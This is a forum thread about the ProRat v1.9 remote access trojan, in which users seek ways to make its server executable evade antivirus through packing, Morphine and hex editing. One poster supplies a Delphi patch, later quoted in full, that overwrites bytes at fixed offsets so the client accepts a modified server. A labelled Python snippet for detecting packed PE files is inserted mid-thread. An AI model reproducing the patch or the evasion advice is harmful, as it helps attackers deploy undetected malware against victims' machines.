Full Version: Pro Rat V1.9
Daume
hi folks

I got the ProRat-v1.9 from the proRAT crew. It seems to be a good RAT, but their last version will not run if you modify the server.exe.

Let me explain it. Their files are detected by most AV, so the first idea coming to my mind is packing, then morphine, then hex, but the client of proRAT detects that the server is modified and does not connect to it :/ This is the free/public version. I guess some changes need to be done to the client.exe, but I don't know what, nor where.

Anyone know about this issue? I browsed the forum, found nothing similar to this topic yet.

appreciate your help
saetji
It's strange but morphin-ing the files/packing might be corrupting the server ... just an idea though. How do u hex them? Mind explaining (even in private) coz that might be the reason it's happening
Daume


Well, as far as the morphin goes, it's kind of a random process every time, so it might work eventually (it did on some other .exe I used).

upx and morphin together don't help (mcafee detects it), unless I can't use them properly =) this can be the case ^^
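
Added example, not part of the thread or of any tool named in it: why the packed server is still flagged. A scanner can read the PE section table without running the file; the section names are specific to UPX, while the entropy check applies to any compressed or encrypted section. The 7.0 threshold, the function names and the sample bytes built by `build_sample` are assumptions made for this illustration.

```python
import math
import struct

PACKER_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}  # section names written by the UPX packer
ENTROPY_THRESHOLD = 7.0  # assumed cut-off; compressed or encrypted data nears 8 bits/byte

def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte (0 for empty input)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / len(data) * math.log2(c / len(data)) for c in counts if c)

def pe_sections(image: bytes):
    """Yield (name, raw_bytes) for each entry in a PE file's section table."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", image, 0x3C)[0]      # e_lfanew
    if image[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    _, n_sections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, pe_off + 4)
    table = pe_off + 24 + opt_size                         # section table follows optional header
    for i in range(n_sections):
        hdr = table + 40 * i                               # each section header is 40 bytes
        name = image[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", image, hdr + 16)
        yield name, image[raw_ptr:raw_ptr + raw_size]

def packing_indicators(image: bytes):
    """Return (section, reason) pairs that suggest the file was packed."""
    findings = []
    for name, raw in pe_sections(image):
        if name in PACKER_SECTION_NAMES:
            findings.append((name, "packer section name"))
        if shannon_entropy(raw) > ENTROPY_THRESHOLD:
            findings.append((name, "high entropy"))
    return findings

def build_sample(sections):
    """Constructed test input: minimal PE headers plus section data, not a runnable program."""
    head = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)
    head += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0)
    ptr = len(head) + 40 * len(sections)
    table = body = b""
    for name, data in sections:
        table += name.encode().ljust(8, b"\0") + struct.pack("<IIII", len(data), 0, len(data), ptr) + b"\0" * 16
        ptr += len(data)
        body += data
    return head + table + body
```

Because the entropy check does not depend on section names, a packed section is still reported when the names have been changed.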

Eyeless
Y'all need to take a look in the Trojan/Viri section. There are tuts that will explain all your questions.
gjohal
Yes, there is a crack. It is here

CODE
program ProPatch;

{$APPTYPE CONSOLE}

uses
 Windows;

var
 Buffer : Pointer;
 Handle, Taille : Cardinal;

begin
 WriteLn('Crack pour serveurs de ProRat1.9 R1 par chti hack');
 Handle := _lopen(PChar(ParamStr(1)), OF_READWRITE);
 if Handle <> INVALID_HANDLE_VALUE then
 begin
   Taille := GetFileSize(Handle, nil);
   Buffer := Pointer(LocalAlloc(0, Taille));
   _lread(Handle, Buffer, Taille);
   _llseek(Handle, 0, FILE_BEGIN);

   PCardinal(Cardinal(Buffer) + $02AB24)^ := $005BF1F6;
   PByte(Cardinal(Buffer) + $029E31)^ := $74;
   PByte(Cardinal(Buffer) + $02A171)^ := $74;
     
   _lwrite(Handle, Buffer, Taille);
   _lclose(Handle);
 end else WriteLn('Impossible d''ouvrir le fichier');
end.


Grab the patch


Discovered by Furtif_00


Making Undetectable Pics and Text

HERE
Daume


thanks for the answers

@Eyeless

I do and still do, always good material and information going through that section. The server which was created was made undetectable, but the pro rat client of the free version detects that it's not the original .exe

@gjohal

thanks for the progz and the code extract, hope it helps me out
jam
I have experienced this with a couple of RATs. Most notably the Beast rat (2.06), which will not run if the exe has been edited. Probably some sort of checksum checking to prevent modification.
stake5k
QUOTE(gjohal @ Sep 25 2004, 06:15 AM)
Yes, there is a crack. It is here

CODE
program ProPatch;

{$APPTYPE CONSOLE}

uses
 Windows;

var
 Buffer : Pointer;
 Handle, Taille : Cardinal;

begin
 WriteLn('Crack pour serveurs de ProRat1.9 R1 par chti hack');
 Handle := _lopen(PChar(ParamStr(1)), OF_READWRITE);
 if Handle <> INVALID_HANDLE_VALUE then
 begin
   Taille := GetFileSize(Handle, nil);
   Buffer := Pointer(LocalAlloc(0, Taille));
   _lread(Handle, Buffer, Taille);
   _llseek(Handle, 0, FILE_BEGIN);

   PCardinal(Cardinal(Buffer) + $02AB24)^ := $005BF1F6;
   PByte(Cardinal(Buffer) + $029E31)^ := $74;
   PByte(Cardinal(Buffer) + $02A171)^ := $74;
     
   _lwrite(Handle, Buffer, Taille);
   _lclose(Handle);
 end else WriteLn('Impossible d''ouvrir le fichier');
end.


Grab the patch



It doesn't work with ProRat 1.9 FiX1
chris105
hence the fix perhaps?
DaywalkerX
it works but it's not undetectable, now I can rename the server file.
Versati
QUOTE(DaywalkerX @ Oct 7 2004, 06:53 PM)
it works but it's not undetectable, now I can rename the server file.



this patch gives u the possibility to modify the server, it's not an undetect patch
DaywalkerX
I know, under the patch gjohal has posted

QUOTE
Making Undetectable Pics and Text

HERE


this doesn't work for me, antivir detects my server file as a backdoor.

rOCk-MaStEr
anybody Found Offsets To change !!!!!
The Signs !!
arann
this undetectable serv has bugs and doesn't work :/